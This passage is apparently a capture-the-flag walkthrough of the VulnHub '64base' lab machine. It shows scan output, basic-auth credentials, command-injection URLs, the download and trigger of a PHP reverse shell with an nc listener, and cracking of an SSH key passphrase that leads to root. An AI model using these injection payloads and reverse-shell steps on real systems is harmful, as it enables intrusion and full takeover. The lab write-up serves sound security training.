code (200) + Entry '/Surface/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Surveillance/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/System/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/systems/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/takes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Technical/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/terrible/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/terror/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/than/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/the/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/The/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/their/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/them/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/These/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/thick/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/this/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/This/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/throughout/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Tie/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/TIE/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/time/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/to/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Tower/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/towers/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Towers/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Tractor/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/trade/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Trade/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/tresses/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Turbolaser/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Turbolifts/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/turned/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Turrets/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Twin/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/two/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Type/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/tyranny/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/unending/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/up/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/upon/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Use/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/usually/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/vast/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Vehicle/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Vent/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/versatile/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/view/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/villains/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Visual/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Walker/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/walls/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/war/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Wars/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/weapon/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/weapons/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/widespread/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/with/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/wondrous/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/worlds/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/XOX/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/X-wing/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/XXXXXXXXXXXXXXXXXXXXX/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y8/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y88/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 429 entries which should be manually viewed. + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Allowed HTTP Methods: POST, OPTIONS, GET, HEAD + OSVDB-3268: /img/: Directory indexing found. + OSVDB-3092: /img/: This might be interesting... + OSVDB-3268: /mail/: Directory indexing found. + OSVDB-3092: /mail/: This might be interesting... + OSVDB-3092: /members/: This might be interesting... + OSVDB-3092: /order/: This might be interesting... + OSVDB-3092: /staff/: This might be interesting... + OSVDB-3092: /manual/: Web server manual found. + OSVDB-3268: /manual/images/: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa) + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus) + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland) + OSVDB-3092: /no/: This might be interesting... potential country code (Norway) + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga) + 8115 requests: 0 error(s) and 434 item(s) reported on remote host + End Time: 2016-12-14 23:41:50 (GMT1) (21 seconds) --------------------------------------------------------------------------- + 1 host(s) tested 10. check robots.txt for 401 $ tail -$(( $(wc -l ./robots.txt | awk '{print $1}') - 1 )) ./robots.txt | sed "s/Disallow: //g" > tocheck $ dirb http://192.168.56.103 ./tocheck | grep 401 + http://192.168.56.103//admin/ (CODE:401|SIZE:461) 11. Try user/pass => fail => So we need to read text! 12. Get informations $ firefox http://192.168.56.103/post.html => We learn that "Only respond if you are a real Imperial-Class BountyHunter" And that we need to user system instead of exec 13. Check manually robots.txt => We see that Imperial-Class is writed Imperial-class => Try it : $ curl -vvv http://192.168.56.103/Imperial-Class curl -vvv http://192.168.56.103/Imperial-Class * Trying 192.168.56.103... * Connected to 192.168.56.103 (192.168.56.103) port 80 (#0) > GET /Imperial-Class HTTP/1.1 > Host: 192.168.56.103 > User-Agent: curl/7.49.1 > Accept: */* > < HTTP/1.1 401 Unauthorized < Date: Wed, 14 Dec 2016 23:06:00 GMT < Server: Apache/2.4.10 (Debian) < WWW-Authenticate: Basic realm="Authorization Required" < Content-Length: 461 < Content-Type: text/html; charset=iso-8859-1 < 401 Unauthorized

Unauthorized

This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required.


Apache/2.4.10 (Debian) Server at 192.168.56.103 Port 80
* Connection #0 to host 192.168.56.103 left intact => Got another 401! 14. Try user/pass => It's working!! $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class 301 Moved Permanently

Moved Permanently

The document has moved here.


Apache/2.4.10 (Debian) Server at 192.168.56.103 Port 80
$ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/ 64base - login

[☠] ERROR: incorrect path!.... TO THE DARK SIDE!

=> Ok i will not forget it and put it in the path => Try it $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/
Please login:
15. Try to submit form => We get another page!?! $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/index.php
Please login:
=> This time got 3 hex string => concatenate this 3 string an unhexify it 16. Decode it $ echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -r -p ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo= $ echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=} => Got 2nd flag $ echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 -d https://www.youtube.com/watch?v=vJwytFWA8uA 17. Check video! => Nothing... 9 years old video... 18. Check everything and finaly check login.php... curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 http://192.168.56.103/Imperial-Class/BountyHunter/login.php flag3{NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=} => Got 3rd flag!!! Wtf!? $ echo "NTNjcjN0NWgzNzcvSW1wZXJpYWwtQ2xhc3MvQm91bnR5SHVudGVyL2xvZ2luLnBocD9mPWV4ZWMmYz1pZAo=" | base64 -d 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id 19. Test login.php parameter and remember use system instead of exec $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=id"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:17:29 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link uid=1001(64base) gid=1001(64base) groups=1001(64base) => Command shell?! Try again! $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=pwd"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:17:57 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link => Nothing... seem to be a command filter but seem to exec f(c) => Got 4rd flag flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==} $ echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 -d 64base:64base5h377 20. Try on /admin => fail 21. Try to get a shell => Try dump c $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=var_dump&c=pwd"

[64base Command Shell]

string(156) "echo '

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base pwd" => Great! Now we see that sudo seem to filter us. Just need to bypass it! $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=;/bin/ls"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:25:34 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link => Nothing! DumpIt! $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=var_dump&c=;/bin/ls"

[64base Command Shell]

string(158) "echo '

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base binls" => Ok there a replace before => Try to bypass sudo $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||ls%20-al"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:29:08 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link total 48 drwxr-xr-x 6 www-data www-data 4096 Dec 13 23:10 . drwxr-xr-x 4 www-data www-data 4096 Dec 13 23:24 .. drwxr-xr-x 2 www-data www-data 4096 Dec 13 23:10 192.168.56.101 -rwxr-x--- 1 www-data www-data 2065 Dec 5 23:42 cat drwxr-xr-x 2 www-data www-data 4096 Dec 5 23:42 css -rwxr-x--- 1 www-data www-data 757 Dec 6 02:02 index.html -rwxr-x--- 1 www-data www-data 705 Dec 5 23:42 index.jade -rwxr-x--- 1 www-data www-data 959 Dec 6 02:13 index.php drwxr-xr-x 2 www-data www-data 4096 Dec 5 23:42 js -rwxr-x--- 1 www-data www-data 1106 Dec 5 23:42 license.txt -rwxr-x--- 1 www-data www-data 835 Dec 6 02:20 login.php drwxr-xr-x 2 www-data www-data 4096 Dec 5 23:42 scss => It works! So who are we? $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||id"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:29:24 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link uid=33(www-data) gid=33(www-data) groups=33(www-data) => So we can't use '/' and we need to upload a shell... Do we have wget? $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||wget%20--version"

[64base Command Shell]

flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}

Debian GNU/Linux 8 \n \l Wed Dec 14 23:30:31 GMT 2016 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux inet addr:192.168.56.103 Bcast:192.168.56.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link GNU Wget 1.16 built on linux-gnu. +digest +https +ipv6 +iri +large-file +nls +ntlm +opie +psl +ssl/gnutls Wgetrc: /etc/wgetrc (system) Locale: /usr/share/locale Compile: gcc -DHAVE_CONFIG_H -DSYSTEM_WGETRC="/etc/wgetrc" -DLOCALEDIR="/usr/share/locale" -I. -I../lib -I../lib -D_FORTIFY_SOURCE=2 -I/usr/include -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -DNO_SSLv2 -D_FILE_OFFSET_BITS=64 -g -Wall Link: gcc -g -O2 -fstack-protector-strong -Wformat -Werror=format-security -DNO_SSLv2 -D_FILE_OFFSET_BITS=64 -g -Wall -Wl,-z,relro -L/usr/lib -lnettle -lgnutls -lz -lpsl -lidn -luuid ftp-opie.o gnutls.o http-ntlm.o ../lib/libgnu.a Copyright (C) 2014 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later . This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Originally written by Hrvoje Niksic . Please send bug reports and questions to . => Ok so we can download recursively an IP :D => On another term where we unzip http://pentestmonkey.net/tools/web-shells/php-reverse-shell $ python -m SimpleHTTPServer 80 $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/login.php?f=system&c=test||wget%20-r%20192.168.56.101" => Shell uploaded! Get it now $ curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.56.103/Imperial-Class/BountyHunter/192.168.56.101/php-reverse-shell.php" (kali) $ nc -lvvp 9999 listening on [any] 9999 ... 192.168.56.103: inverse host lookup failed: Unknown host connect to [192.168.56.101] from (UNKNOWN) [192.168.56.103] 33493 Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux 23:37:55 up 0 min, 0 users, load average: 0.39, 0.12, 0.04 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ => Got it!!! 22. Check what is inside /admin $ cd /var/www/html/admin $ ls S3cR37 index.php $ cd S* $ ls flag5{TG9vayBJbnNpZGUhIDpECg==} => Got flag 5! $ echo "TG9vayBJbnNpZGUhIDpECg==" | base64 -d Look Inside! :D 23. Check file $ python -m SimpleHTTPServer (kali) Download flag (kali) $ file flag5{TG9vayBJbnNpZGUhIDpECg==} flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39", baseline, precision 8, 960x720, frames 3 => Seem to have another hex string in comment, extract it! 24. Extract comment $ exiftool -comment flag5.jpg | sed "s/Comment : //" | xxd -r -p | base64 -d > id_rsa.priv -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6 YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0 kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP -----END RSA PRIVATE KEY----- 25. Try to use it $ ssh -p 62964 -i id_rsa.priv root@192.168.56.103 Enter passphrase for key 'id_rsa.priv': => Password? Try 64base5h377... Fail... 26. Bruteforce passphrase with http://www.leidecker.info/projects/phrasendrescher/ $ pd pkey -d /usr/share/wordlists/rockyou.txt -K ./id_rsa.priv phrasen|drescher 1.2.2b - the passphrase cracker Copyright (C) 2008 Nico Leidecker; http://www.leidecker.info password for ./id_rsa.priv: usetheforce finished! bye, bye.. => Yeah!! I's the same as in flag5 JPEG 27. Finish it! $ ssh -p 62964 -i id_rsa.priv root@192.168.56.103 Enter passphrase for key 'id_rsa.priv': usetheforce Last login: Wed Dec 14 22:01:32 2016 from 192.168.56.101 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK} root@64base:~# => Yeah $ echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" | base64 -d | xxd -r -p | base64 -d | xxd -r -p | base64 -d base64 -d /var/local/.luke|less.real $ base64 -d /var/local/.luke|less.real .... ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| _ _ ____ __ __ __ __ ____ _ _ _ _____ ______ | \ | | / __ \\ \ / / \ \ / // __ \ | | | |( )| __ \ | ____| | \| || | | |\ \ /\ / / \ \_/ /| | | || | | ||/ | |__) || |__ | . ` || | | | \ \/ \/ / \ / | | | || | | | | _ / | __| | |\ || |__| | \ /\ / | | | |__| || |__| | | | \ \ | |____ |_| \_| \____/ \/ \/ |_| \____/ \____/ |_| \_\|______| _ ______ _____ _____ _ /\ | || ____|| __ \|_ _|| | / \ | || |__ | | | | | | | | / /\ \ _ | || __| | | | | | | | | / ____ \ | |__| || |____ | |__| |_| |_ |_| /_/ \_\ \____/ |______||_____/|_____|(_) ______ ______ ______ ______ ______ ______ ______ ______ ______ |______||______||______||______||______||______||______||______||______| I hope you enjoyed this challenge Please leave comments & feedback @ https://www.vulnhub.com/?q=64base ----------------------------------- 64Base Challenge by 3mrgnc3 https://3mrgnc3.ninja/challenges ----------------------------------- => Finished!!!